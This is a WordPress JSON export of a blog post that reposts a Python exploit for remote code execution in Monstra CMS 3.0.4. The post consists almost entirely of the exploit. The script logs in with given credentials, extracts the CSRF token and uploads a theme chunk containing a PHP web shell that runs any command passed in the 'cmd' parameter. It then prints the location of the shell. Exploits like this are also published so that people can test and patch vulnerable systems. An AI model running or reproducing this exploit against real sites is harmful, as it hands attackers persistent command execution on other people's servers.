{"id":57231,"date":"2024-06-03T18:49:44","date_gmt":"2024-06-03T15:49:44","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178893\/monstracms304aub-exec.txt"},"modified":"2024-06-03T18:49:44","modified_gmt":"2024-06-03T15:49:44","slug":"monstra-cms-3-0-4-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/monstra-cms-3-0-4-remote-code-execution\/","title":{"rendered":"Monstra CMS 3.0.4 Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Monstra CMS 3.0.4 &#8211; Remote Code Execution (RCE)<br \/># Date: 05.05.2024<br \/># Exploit Author: Ahmet \u00dcmit BAYRAM<br \/># Vendor Homepage: https:\/\/monstra.org\/<br \/># Software Link: https:\/\/monstra.org\/monstra-3.0.4.zip<br \/># Version: 3.0.4<br \/># Tested on: MacOS<\/p>\n<p>import requests<br \/>import random<br \/>import string<br \/>import time<br \/>import re<br \/>import sys<\/p>\n<p>if len(sys.argv) &lt; 4:<br \/>print(&#8220;Usage: python3 script.py &lt;url&gt; &lt;username&gt; &lt;password&gt;&#8221;)<br \/>sys.exit(1)<\/p>\n<p>base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]\n<p>session = requests.Session()<\/p>\n<p>login_url = f'{base_url}\/admin\/index.php?id=dashboard&#8217;<br \/>login_data = {<br \/>&#8216;login&#8217;: username,<br \/>&#8216;password&#8217;: password,<br \/>&#8216;login_submit&#8217;: &#8216;Log+In&#8217;<br \/>}<\/p>\n<p>filename = &#8221;.join(random.choices(string.ascii_lowercase + string.digits, k=<br \/>5))<\/p>\n<p>print(&#8220;Logging in&#8230;&#8221;)<br \/>response = session.post(login_url, data=login_data)<\/p>\n<p>if &#8216;Dashboard&#8217; in response.text:<br \/>print(&#8220;Login successful&#8221;)<br \/>else:<br \/>print(&#8220;Login failed&#8221;)<br \/>exit()<\/p>\n<p>time.sleep(3)<\/p>\n<p>edit_url = f'{base_url}\/admin\/index.php?id=themes&amp;action=add_chunk&#8217;<br \/>response = session.get(edit_url) # CSRF token bulmak i\u00e7in edit sayfas\u0131na<br \/>eri\u015fim<\/p>\n<p>token_search = re.search(r&#8217;input type=&#8221;hidden&#8221; id=&#8221;csrf&#8221; name=&#8221;csrf&#8221; value=&#8221;<br \/>(.*?)&#8221;&#8216;, response.text)<br \/>if token_search:<br \/>token = token_search.group(1)<br \/>else:<br \/>print(&#8220;CSRF token could not be found.&#8221;)<br \/>exit()<\/p>\n<p>content = &#8221;&#8217;<br \/>&lt;html&gt;<br \/>&lt;body&gt;<br \/>&lt;form method=&#8221;GET&#8221; name=&#8221;&lt;?php echo basename($_SERVER[&#8216;PHP_SELF&#8217;]); ?&gt;&#8221;&gt;<br \/>&lt;input type=&#8221;TEXT&#8221; name=&#8221;cmd&#8221; autofocus id=&#8221;cmd&#8221; size=&#8221;80&#8243;&gt;<br \/>&lt;input type=&#8221;SUBMIT&#8221; value=&#8221;Execute&#8221;&gt;<br \/>&lt;\/form&gt;<br \/>&lt;pre&gt;<br \/>&lt;?php<br \/>if(isset($_GET[&#8216;cmd&#8217;]))<br \/>{<br \/>system($_GET[&#8216;cmd&#8217;]);<br \/>}<br \/>?&gt;<br \/>&lt;\/pre&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<br \/>&#8221;&#8217;<\/p>\n<p>edit_data = {<br \/>&#8216;csrf&#8217;: token,<br \/>&#8216;name&#8217;: filename,<br \/>&#8216;content&#8217;: content,<br \/>&#8216;add_file&#8217;: &#8216;Save&#8217;<br \/>}<\/p>\n<p>print(&#8220;Preparing shell&#8230;&#8221;)<br \/>response = session.post(edit_url, data=edit_data)<br \/>time.sleep(3)<\/p>\n<p>if response.status_code == 200:<br \/>print(f&#8221;Your shell is ready: {base_url}\/public\/themes\/default\/{filename}<br \/>.chunk.php&#8221;)<br \/>else:<br \/>print(&#8220;Failed to prepare shell.&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Monstra CMS 3.0.4 &#8211; Remote Code Execution (RCE)# Date: 05.05.2024# Exploit Author: Ahmet \u00dcmit BAYRAM# Vendor Homepage: https:\/\/monstra.org\/# Software Link: https:\/\/monstra.org\/monstra-3.0.4.zip# Version: 3.0.4# Tested on: MacOS import requestsimport randomimport stringimport timeimport reimport sys if len(sys.argv) &lt; 4:print(&#8220;Usage: python3 script.py &lt;url&gt; &lt;username&gt; &lt;password&gt;&#8221;)sys.exit(1) base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3] session = requests.Session() &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57231","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57231"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57231\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}